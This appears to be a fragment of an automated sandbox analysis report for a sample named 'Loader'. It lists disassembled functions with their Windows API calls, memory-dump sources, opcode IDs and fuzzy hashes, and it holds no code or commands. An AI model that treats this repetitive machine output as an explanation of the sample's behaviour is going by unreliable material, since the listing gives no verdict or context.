                                                                                                  • Instruction Fuzzy Hash: 9231F8B5D053289BDF20DFA5DD497CDBBB8AF08300F1045AAE40CAB250E7719A849F45
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009416C4
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0094170E
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 009417D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 661929714-0
                                                                                                  • Opcode ID: 81c582e99c1116437a15db3706e3c3fad1a2bdc008ed72e876825e1285dd89a5
                                                                                                  • Instruction ID: fee19a070f4232aa73e97fffa7e1a0bebf9696e9c264ecb4d9a563f306fa593a
                                                                                                  • Opcode Fuzzy Hash: 81c582e99c1116437a15db3706e3c3fad1a2bdc008ed72e876825e1285dd89a5
                                                                                                  • Instruction Fuzzy Hash: 8561AF719102179FEB289F28CC82FBA77A8FF44351F104179E905C6285EB39E9C1DB50
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00938018
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00938022
                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0093802F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: 26e735eb93a3215050fbeb744a7c645cc0301fc79f3d0f79155cd87c91e594cb
                                                                                                  • Instruction ID: 25782ac0159c3b58e2506b360954839fd05fc85abecde8c294cfcc86edc79490
                                                                                                  • Opcode Fuzzy Hash: 26e735eb93a3215050fbeb744a7c645cc0301fc79f3d0f79155cd87c91e594cb
                                                                                                  • Instruction Fuzzy Hash: 7431D474901328ABCB21DF65DD887DDBBB8BF48310F5045EAE40CA7291EB309B858F44
                                                                                                  APIs
                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 009301DC
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,F84A4DD6,00928FD0,?,0094BF67,000000FF,?,0092FEA4,?,00000000,00000000,?,0092FEC8,?,00928FD0,?), ref: 009301E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$FileSystem$Precise
                                                                                                  • String ID:
                                                                                                  • API String ID: 743729956-0
                                                                                                  • Opcode ID: a71f85a717e6883b9c45e803a0391e733e516048fb3b2c4022691ab974fb8a47
                                                                                                  • Instruction ID: e5af052ded2cc065ec716f4e841b2f7925a6f9c38eff383b107b7434241e23fb
                                                                                                  • Opcode Fuzzy Hash: a71f85a717e6883b9c45e803a0391e733e516048fb3b2c4022691ab974fb8a47
                                                                                                  • Instruction Fuzzy Hash: BDF03072A1C658AFC7019F45DC41B5DBBB8F748B65F00466AEC1293690DB35A900DB80
                                                                                                  APIs
                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00945CA9,?,?,00000008,?,?,0094BD9B,00000000), ref: 00945F7B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise
                                                                                                  • String ID:
                                                                                                  • API String ID: 3997070919-0
                                                                                                  • Opcode ID: 05bb99ac47fac44ecbeb3bcd83bed0dc77ff82568837f4398b17b49227f58b05
                                                                                                  • Instruction ID: 271b8db50eea7ddd05d7954d461ff481696744cd0d08f38d3d84aff53b6aac94
                                                                                                  • Opcode Fuzzy Hash: 05bb99ac47fac44ecbeb3bcd83bed0dc77ff82568837f4398b17b49227f58b05
                                                                                                  • Instruction Fuzzy Hash: 86B15E71610A08DFD715CF68C48AF657BE0FF45365F268698E899CF2A2C335EA81CB41
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0092F65B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 2325560087-0
                                                                                                  • Opcode ID: b706a730584715c069969a76849dad66c36d9a9cf1adea0bba69a633fc7ee5c9
                                                                                                  • Instruction ID: 7a66778b71d9981715406d9283805408c4e5a704e71656055a526eda8c69c896
                                                                                                  • Opcode Fuzzy Hash: b706a730584715c069969a76849dad66c36d9a9cf1adea0bba69a633fc7ee5c9
                                                                                                  • Instruction Fuzzy Hash: DFA19AB29297188FDB18CF56E8917A9BBF8FB48361F24913AD511E73A4D3349980CF50
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093D3A4: HeapAlloc.KERNEL32(00000008,?,?,?,0093C2A7,00000001,00000364,?,00000003,000000FF,?,00935585,00958E90,0000000C), ref: 0093D3E5
                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009421C9
                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 009422BD
                                                                                                  • FindClose.KERNEL32(00000000), ref: 009422FC
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0094232F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 2701053895-0
                                                                                                  • Opcode ID: 5e0cb206ee7d52945938c831022811b5448cd46f1fbfb83bd26051ae1fc02fd1
                                                                                                  • Instruction ID: ce559610a8acfb27d5b2f55af340ea2252e42cc86dc13b51cf02cdc86d021c90
                                                                                                  • Opcode Fuzzy Hash: 5e0cb206ee7d52945938c831022811b5448cd46f1fbfb83bd26051ae1fc02fd1
                                                                                                  • Instruction Fuzzy Hash: 46516875904218AFDF24EF289C84EBEB7BDEF89318F5441A9F50997201EA308D429B20
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00941984
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 57fe3fd1b45849a008ab2a40f8e77b37ca9bd0bc5d03449d684bfde5da159f7f
                                                                                                  • Instruction ID: 3fd3a61d5c180c8cf915a6550fa034d9260ff8b15ad134e6f7fadce45219e37d
                                                                                                  • Opcode Fuzzy Hash: 57fe3fd1b45849a008ab2a40f8e77b37ca9bd0bc5d03449d684bfde5da159f7f
                                                                                                  • Instruction Fuzzy Hash: 5E21C572610206ABDB289E65EC52FBB73ACEF44311F10007AF906D7181EB35ED809B50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 0-4108050209
                                                                                                  • Opcode ID: 4bd0eb6af48cb1e09036bc0a632ebf050a1ed1f494595e6da78b9860e95e5ca8
                                                                                                  • Instruction ID: 029d8425760d5e1bbc37805054421f6da8e35882db23dc4b6632b212234102e2
                                                                                                  • Opcode Fuzzy Hash: 4bd0eb6af48cb1e09036bc0a632ebf050a1ed1f494595e6da78b9860e95e5ca8
                                                                                                  • Instruction Fuzzy Hash: C9B11830904A0A8BCF28CFA8C9556BFBBB9EF61300F16061DE5A2A7691C734BD41CF51
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • EnumSystemLocalesW.KERNEL32(00941670,00000001,00000000,?,-00000050,?,00941453,00000000,-00000002,00000000,?,00000055,?), ref: 0094163A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 40f69896cc0de8de5911b438832620c5f122d845a43d000927d4447b5e5eabe6
                                                                                                  • Instruction ID: a9472fe8744780abcb9c96fa2d1d80d4e6fd3ddb766f5643fad185bd7492efd2
                                                                                                  • Opcode Fuzzy Hash: 40f69896cc0de8de5911b438832620c5f122d845a43d000927d4447b5e5eabe6
                                                                                                  • Instruction Fuzzy Hash: E1110C372007059FDB189F79D8A1ABAB795FFC4359B19442CE58747740D771B982CB40
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00941AA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: 2466f622f717429d8eb71b4c72a75b84b27a9b8f219ed3283c78eb50aa7bb9c8
                                                                                                  • Instruction ID: eb8dd2398f878d39c7089d043d2a45b86c3dce4e3cb3614a0a4a33e5def45fc4
                                                                                                  • Opcode Fuzzy Hash: 2466f622f717429d8eb71b4c72a75b84b27a9b8f219ed3283c78eb50aa7bb9c8
                                                                                                  • Instruction Fuzzy Hash: E4110E72611606ABDB18AF69DC42EBB77ECEF84321F10417AF502D7241EB38ED449B90
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0094188C,00000000,00000000,?), ref: 00941C29
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 3736152602-0
                                                                                                  • Opcode ID: fc4e408570edb8d4d90bede62beacb455df26569fabf5c2a3b473967465b1c0b
                                                                                                  • Instruction ID: f70028d17d74c488c2550bec7b3ccf0f704623a868dbaebf8e812457e8a061a6
                                                                                                  • Opcode Fuzzy Hash: fc4e408570edb8d4d90bede62beacb455df26569fabf5c2a3b473967465b1c0b
                                                                                                  • Instruction Fuzzy Hash: 6201FE32750212ABDB285764CCC5FBF7768EB40756F154829EC86A3280EA34FE81C690
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • EnumSystemLocalesW.KERNEL32(00941930,00000001,?,?,-00000050,?,0094141B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0094190D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: ff1da80e3158df106676f4bc4458ff56c0fa45bd49e40265d9c3dd0f2ab97688
                                                                                                  • Instruction ID: 2695c9cd8a029d07eec4914d83941c8111767d2b06d1f6aeb0314c8cba14d5d8
                                                                                                  • Opcode Fuzzy Hash: ff1da80e3158df106676f4bc4458ff56c0fa45bd49e40265d9c3dd0f2ab97688
                                                                                                  • Instruction Fuzzy Hash: 4BF0F6362003045FDB245F79EC95E7A7B95EFC0768F09442CFA854B690D671AD82CB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 009381D1: EnterCriticalSection.KERNEL32(?,?,0093C6E8,?,009592E8,00000008,0093C5DA,?,?,?), ref: 009381E0
                                                                                                  • EnumSystemLocalesW.KERNEL32(0093D2A0,00000001,00959368,0000000C,0093CC01,-00000050), ref: 0093D2E5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  • Opcode ID: 7a66a64bee84e7e7b992b5a5882dbfc9ba69718686e2ec1f0fb3787756487c29
                                                                                                  • Instruction ID: 20871fdc0b5cb252fc20d6076c71b6d403041a08a2ea22c25b2df1217db412cc
                                                                                                  • Opcode Fuzzy Hash: 7a66a64bee84e7e7b992b5a5882dbfc9ba69718686e2ec1f0fb3787756487c29
                                                                                                  • Instruction Fuzzy Hash: 13F04932A19304DFE710EFA9E852B9DB7F0EB88726F10812AF410DB2A0CB7959009F41
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • EnumSystemLocalesW.KERNEL32(00941A50,00000001,?,?,?,00941475,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00941A3C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 2417226690-0
                                                                                                  • Opcode ID: 31e0e8a4afce4a264dcedfc8116ca8db5e60ade2e42ad53007906e7558024d09
                                                                                                  • Instruction ID: 57a470b6b0b9296cf8e3b092f5c8d4683e2729ad8a8ec89b8eb98148f0efc282
                                                                                                  • Opcode Fuzzy Hash: 31e0e8a4afce4a264dcedfc8116ca8db5e60ade2e42ad53007906e7558024d09
                                                                                                  • Instruction Fuzzy Hash: DCF0E53A30020597CB189F79D855A6BBFA4EFC1765F0A4058EA1A8B251C671A882C794
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00936F23,?,20001004,00000000,00000002,?,?,00935E2D), ref: 0093CD39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
